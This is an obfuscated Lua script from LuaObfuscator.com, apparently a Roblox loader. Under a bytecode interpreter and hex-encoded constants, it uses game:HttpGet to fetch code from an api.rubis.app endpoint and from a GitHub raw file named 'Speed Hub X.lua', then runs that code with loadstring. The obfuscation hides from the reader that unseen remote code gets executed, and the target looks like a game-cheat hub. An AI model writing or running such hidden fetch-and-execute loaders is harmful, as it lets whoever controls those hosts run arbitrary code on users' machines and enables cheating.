--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v88=0;while true do if (v88==0) then v19=v0(v3(v30,1,1));return "";end end else local v89=0;local v90;while true do if (v89==0) then v90=v2(v0(v30,16));if v19 then local v120=v5(v90,v19);v19=nil;return v120;else return v90;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v91=0 -0 ;local v92;while true do if (v91==(0 -(0 -0))) then v92=(v31/((1639 -(1523 + 114))^(v32-(1 + 0))))%((3 -1)^(((v33-(2 -1)) -(v32-(1271 -(226 + 1044)))) + (4 -3))) ;return v92-(v92%(118 -(32 + 85))) ;end end else local v93=619 -(555 + 64) ;local v94;while true do if (v93==((1720 -789) -(857 + 74))) then v94=(570 -(367 + 201))^(v32-(928 -(214 + (1308 -595)))) ;return (((v31%(v94 + v94))>=v94) and ((351 -(87 + 263)) + 0)) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (182 -(67 + 113)) );v18=v18 + 2 + 0 ;return (v36 * (628 -372)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (15 -(9 + 2)) ;return (v40 * (16778168 -(802 + 150))) + (v39 * (176444 -110908)) + (v38 * ((1461 -(915 + 82)) -208)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1;local v44=(v20(v42,1,56 -36 ) * ((2 + 0)^32)) + v41 ;local v45=v20(v42,27 -6 ,31);local v46=((v20(v42,1219 -(1069 + 118) )==((440 -(145 + 293)) -1)) and  -(1 -(430 -(44 + 386)))) or (1 + 0) ;if (v45==((1486 -(998 + 488)) -0)) then if (v44==(0 + 0 + 0)) then return v46 * (791 -(302 + 66 + 423)) ;else v45=3 -2 ;v43=0;end elseif (v45==(2065 -(10 + 8))) then return ((v44==((772 -(201 + 571)) -0)) and (v46 * ((443 -(416 + 26))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(440 + 583) ) * (v43 + (v44/(2^(91 -39)))) ;end local function v25(v47) local v48;if  not v47 then v47=v23();if (v47==(1138 -(116 + 1022))) then return "";end end v48=v3(v16,v18,(v18 + v47) -(4 -3) );v18=v18 + v47 ;local v49={};for v65=3 -2 , #v48 do v49[v65]=v2(v1(v3(v48,v65,v65)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103) local v104=(function() return 202 -(14 + 188) ;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do local v112=(function() return 675 -(534 + 141) ;end)();while true do if (v112==(0 + 0)) then if (v104~=1) then else local v124=(function() return 0 + 0 ;end)();while true do if (v124==0) then local v180=(function() return 0;end)();while true do if ((0 + 0)==v180) then while true do if (v95==(0 -0)) then v96=(function() return v97();end)();if (v98(v96, #"{", #"\\")==0) then local v197=(function() return 0 -0 ;end)();local v198=(function() return;end)();local v199=(function() return;end)();local v200=(function() return;end)();while true do if (v197~=(0 -0)) then else local v201=(function() return 0;end)();while true do if (v201~=(1 + 0)) then else v197=(function() return 1 + 0 ;end)();break;end if (v201~=(396 -(115 + 281))) then else v198=(function() return v98(v96,2, #"asd");end)();v199=(function() return v98(v96, #"0836",6);end)();v201=(function() return 1;end)();end end end if ((6 -3)==v197) then if (v98(v199, #"asd", #"asd")~= #">") then else v200[ #"0313"]=(function() return v101[v200[ #".dev"]];end)();end v102[v103]=(function() return v200;end)();break;end if (v197==1) then local v203=(function() return 0;end)();while true do if (v203~=1) then else v197=(function() return 2 + 0 ;end)();break;end if (v203~=(0 -0)) then else v200=(function() return {v99(),v99(),nil,nil};end)();if (v198==0) then local v207=(function() return 867 -(550 + 317) ;end)();local v208=(function() return;end)();while true do if (v207~=0) then else v208=(function() return 0;end)();while true do if (v208==(0 -0)) then v200[ #"91("]=(function() return v99();end)();v200[ #".com"]=(function() return v99();end)();break;end end break;end end elseif (v198== #"[") then v200[ #"91("]=(function() return v100();end)();elseif (v198==2) then v200[ #"xxx"]=(function() return v100() -((2 -0)^16) ;end)();elseif (v198== #"-19") then local v213=(function() return 0;end)();local v214=(function() return;end)();while true do if (0~=v213) then else v214=(function() return 0 -0 ;end)();while true do if (v214~=0) then else v200[ #"xnx"]=(function() return v100() -((287 -(134 + 151))^16) ;end)();v200[ #"asd1"]=(function() return v99();end)();break;end end break;end end end v203=(function() return 1666 -(970 + 695) ;end)();end end end if (v197~=2) then else if (v98(v199, #"!", #",")== #"~") then v200[3 -1 ]=(function() return v101[v200[2]];end)();end if (v98(v199,1992 -(582 + 1408) ,6 -4 )~= #"}") then else v200[ #"asd"]=(function() return v101[v200[ #"gha"]];end)();end v197=(function() return 3 -0 ;end)();end end end break;end end return v95,v96,v97,v98,v99,v100,v101,v102,v103;end end end end end if (v104~=(0 -0)) then else local v125=(function() return 0;end)();while true do if ((1824 -(1195 + 629))==v125) then v95=(function() return 0;end)();v96=(function() return nil;end)();v125=(function() return 1;end)();end if ((1 -0)==v125) then v104=(function() return 1;end)();break;end end end break;end end end end;end)();local v51=(function() return function(v105,v106,v107) local v108=(function() return 0;end)();while true do if (v108~=(241 -(187 + 54))) then else local v118=(function() return 780 -(162 + 618) ;end)();local v119=(function() return;end)();while true do if (v118~=(0 + 0)) then else v119=(function() return 0 + 0 ;end)();while true do if (v119~=0) then else local v181=(function() return 0 -0 ;end)();while true do if ((0 -0)~=v181) then else v105[v106-#"[" ]=(function() return v107();end)();return v105,v106,v107;end end end end break;end end end end end;end)();local v52=(function() return {};end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {v52,v53,nil,v54};end)();local v56=(function() return v23();end)();local v57=(function() return {};end)();for v67= #"<",v56 do local v68=(function() return 1636 -(1373 + 263) ;end)();local v69=(function() return;end)();local v70=(function() return;end)();local v71=(function() return;end)();while true do if (v68==(1001 -(451 + 549))) then v71=(function() return nil;end)();while true do if (v69==(1 + 0)) then if (v70== #">") then v71=(function() return v21()~=0 ;end)();elseif (v70==(2 -0)) then v71=(function() return v24();end)();elseif (v70~= #"-19") then else v71=(function() return v25();end)();end v57[v67]=(function() return v71;end)();break;end if (v69==0) then local v122=(function() return 0;end)();local v123=(function() return;end)();while true do if (v122~=(0 -0)) then else v123=(function() return 1384 -(746 + 638) ;end)();while true do if (v123~=(1 + 0)) then else v69=(function() return 1;end)();break;end if ((0 -0)==v123) then local v191=(function() return 341 -(218 + 123) ;end)();while true do if (v191==1) then v123=(function() return 1582 -(1535 + 46) ;end)();break;end if (v191==(0 + 0)) then v70=(function() return v21();end)();v71=(function() return nil;end)();v191=(function() return 1 + 0 ;end)();end end end end break;end end end end break;end if ((560 -(306 + 254))~=v68) then else local v113=(function() return 0;end)();while true do if (v113~=(0 + 0)) then else v69=(function() return 0 -0 ;end)();v70=(function() return nil;end)();v113=(function() return 1;end)();end if (v113==1) then v68=(function() return 1;end)();break;end end end end end v55[ #"19("]=(function() return v21();end)();for v72= #"{",v23() do FlatIdent_39B0,Descriptor,v21,v20,v22,v23,v57,v52,v72=(function() return v50(FlatIdent_39B0,Descriptor,v21,v20,v22,v23,v57,v52,v72);end)();end for v73= #"}",v23() do v53,v73,v28=(function() return v51(v53,v73,v28);end)();end return v55;end local function v29(v59,v60,v61) local v62=v59[1468 -(899 + (1335 -767)) ];local v63=v59[2 + 0 ];local v64=v59[7 -4 ];return function(...) local v74=v62;local v75=v63;local v76=v64;local v77=v27;local v78=604 -(268 + 335) ;local v79= -((1268 -(553 + 424)) -(60 + 230));local v80={};local v81={...};local v82=v12("#",...) -(1 + 0) ;local v83={};local v84={};for v109=1456 -(282 + 1174) ,v82 do if (v109>=v76) then v80[v109-v76 ]=v81[v109 + 1 ];else v84[v109]=v81[v109 + (812 -(569 + (1444 -(373 + 829)))) ];end end local v85=(v82-v76) + 1 ;local v86;local v87;while true do v86=v74[v78];v87=v86[2 -1 ];if (v87<=(1 + 4)) then if (v87<=(1026 -(706 + (1049 -(476 + 255))))) then if (v87<=(1251 -(721 + 530))) then v84[v86[(2406 -1133) -(945 + 326) ]]=v86[7 -4 ]~=(0 + 0) ;elseif ((4255>=55) and (v87==(701 -(271 + 378 + 51)))) then v78=v86[3 + 0 ];else local v135=v86[2];local v136,v137=v77(v84[v135](v13(v84,v135 + 1 ,v86[1503 -((2538 -(369 + 761)) + 54 + 38) ])));v79=(v137 + v135) -(1087 -(461 + 625)) ;local v138=0;for v182=v135,v79 do local v183=1288 -(993 + 295) ;while true do if ((2999>1156) and (v183==((0 -0) + 0))) then v138=v138 + (1172 -((791 -373) + 753)) ;v84[v182]=v136[v138];break;end end end end elseif (v87<=(2 + 1)) then local v127=(238 -(64 + 174)) + 0 + 0 ;local v128;while true do if ((v127==(0 + 0)) or (1818==85)) then v128=v86[1 + 1 ];v84[v128]=v84[v128](v13(v84,v128 + 1 + 0 ,v79));break;end end elseif (v87>((311 + 222) -(406 + 123))) then v84[v86[2]]();else do return;end end elseif (v87<=(1777 -(1749 + 20))) then if ((2350>1155) and (630<2127) and (v87<=(3 + 3))) then local v129=v86[1 + (1 -0) ];local v130=v84[v86[1325 -(1249 + 42 + 31) ]];v84[v129 + 1 + 0 ]=v130;v84[v129]=v130[v86[(2490 -1341) -(466 + 679) ]];elseif ((v87==(16 -9)) or (1938==2514)) then local v139;local v140,v141;local v142;v84[v86[2]]=v86[8 -5 ]~=(1900 -(106 + 1794)) ;v78=v78 + 1 + 0 ;v86=v74[v78];v142=v86[1 + (217 -(42 + 174)) ];v140,v141=v77(v84[v142](v13(v84,v142 + (2 -(1 + 0)) ,v86[7 -4 ])));v79=(v141 + v142) -(115 -(4 + 110)) ;v139=584 -(57 + 527) ;for v186=v142,v79 do local v187=1427 -(41 + 1149 + 237) ;while true do if ((4029<=4853) and (v187==0)) then v139=v139 + 1 + 0 ;v84[v186]=v140[v139];break;end end end v78=v78 + (104 -(17 + 86)) ;v86=v74[v78];v142=v86[2 + 0 ];v84[v142]=v84[v142](v13(v84,v142 + 1 ,v79));v78=v78 + 1 ;v86=v74[v78];v84[v86[3 -1 ]]();v78=v78 + (2 -(1505 -(363 + 1141))) ;v86=v74[v78];v78=v86[169 -(122 + 44) ];else v84[v86[2 -0 ]]=v86[9 -6 ];end elseif (v87<=((1588 -(1183 + 397)) + 1)) then if (v84[v86[1 + 1 ]]==v86[7 -(8 -5) ]) then v78=v78 + (66 -(30 + 26 + 9)) ;else v78=v86[3 + 0 ];end elseif (v87>10) then v84[v86[1259 -(1043 + 214) ]]=v61[v86[11 -8 ]];else local v154;local v155,v156;local v157;local v158;v84[v86[1214 -(323 + 889) ]]=v61[v86[3 + 0 ]];v78=v78 + (2 -1) ;v86=v74[v78];v158=v86[2];v157=v84[v86[583 -((2336 -(1913 + 62)) + 219) ]];v84[v158 + 1 ]=v157;v84[v158]=v157[v86[324 -(53 + 267) ]];v78=v78 + 1 + 0 ;v86=v74[v78];v84[v86[415 -(15 + 398) ]]=v86[(621 + 364) -(18 + 964) ];v78=v78 + (3 -2) ;v86=v74[v78];v84[v86[2 + (0 -0) ]]=v86[(1935 -(565 + 1368)) + 1 ]~=0 ;v78=v78 + ((2370 -1519) -((44 -24) + 830)) ;v86=v74[v78];v158=v86[2 + 0 + 0 ];v155,v156=v77(v84[v158](v13(v84,v158 + (127 -(116 + 10)) ,v86[1 + 2 ])));v79=(v156 + v158) -1 ;v154=0 -0 ;for v188=v158,v79 do v154=v154 + (739 -(542 + (737 -541))) ;v84[v188]=v155[v154];end v78=v78 + ((754 -(239 + 514)) -0) ;v86=v74[v78];v158=v86[1 + 1 ];v84[v158]=v84[v158](v13(v84,v158 + 1 + 0 + 0 ,v79));v78=v78 + 1 ;v86=v74[v78];v84[v86[2]]();v78=v78 + 1 + 0 ;v86=v74[v78];v84[v86[(1333 -(797 + 532)) -2 ]]=v61[v86[3]];v78=v78 + (2 -1) ;v86=v74[v78];v84[v86[1553 -(1126 + 425) ]]=v61[v86[408 -(118 + 209 + 78) ]];v78=v78 + (3 -(1663 -(1477 + 184))) ;v86=v74[v78];v158=v86[1123 -(118 + 1003) ];v157=v84[v86[8 -5 ]];v84[v158 + (378 -(142 + 80 + 155)) ]=v157;v84[v158]=v157[v86[18 -14 ]];end v78=v78 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403333Q00682Q7470733A2Q2F6170692E72756269732E612Q702F76322F73637261702F416E4D495061715462737943625A52342F726177034F3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F41686D6164562Q392F53702Q65642D4875622D582F6D61696E2F53702Q6564253230487562253230582E6C756100163Q0012083Q00013Q0026093Q0001000100010004013Q0001000100120B000100023Q00120A000200033Q00202Q00020002000400122Q000400056Q000500016Q000200056Q00013Q00024Q00010001000100122Q000100023Q00122Q000200033Q00202Q000200020004001208000400064Q0007000500016Q000200056Q00013Q00024Q00010001000100044Q001500010004013Q000100012Q00043Q00017Q00",v9(),...);
